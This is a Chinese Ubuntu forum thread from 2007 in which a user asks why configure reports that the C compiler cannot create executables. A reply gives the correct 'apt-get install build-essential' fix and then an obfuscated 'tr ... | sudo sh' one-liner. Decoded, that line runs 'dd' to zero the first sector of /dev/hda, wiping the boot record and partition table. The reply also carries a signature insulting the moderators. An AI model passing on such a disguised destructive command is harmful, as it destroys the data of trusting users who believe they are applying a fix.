[问题]ubuntu下安装软件包出问

为当前最终发行版之前的所有版本提供支持
回复
kidder
帖子: 12
注册时间: 2007-04-03 17:44
送出感谢: 0
接收感谢: 0

[问题]ubuntu下安装软件包出问

#1

帖子 kidder » 2007-05-08 22:03

现在安装什么软件包,都提示下面的错误,不知道该怎么解决:
checking for C compiler default output... configure: error: C compiler cannot create executables
See `config.log' for more details.

这个该怎么解决呢,急等
ziyun
帖子: 262
注册时间: 2007-03-29 12:59
送出感谢: 0
接收感谢: 0

#2

帖子 ziyun » 2007-05-08 22:05

你的gcc没装好
sudo apt-get install build-essential
echo 'qq%vs+&qri&mreb%bs+&qri&uqn%of+FBC%pbhag+B' | tr 'n-za-m&+A-J%' 'a-z/=0-9 ' |sudo sh #<-警告:
强烈鄙视SB版主,一群跟风的SB,一群自以为是的SB
对这个论坛彻底失望了
回复

回到 “老旧版本支持”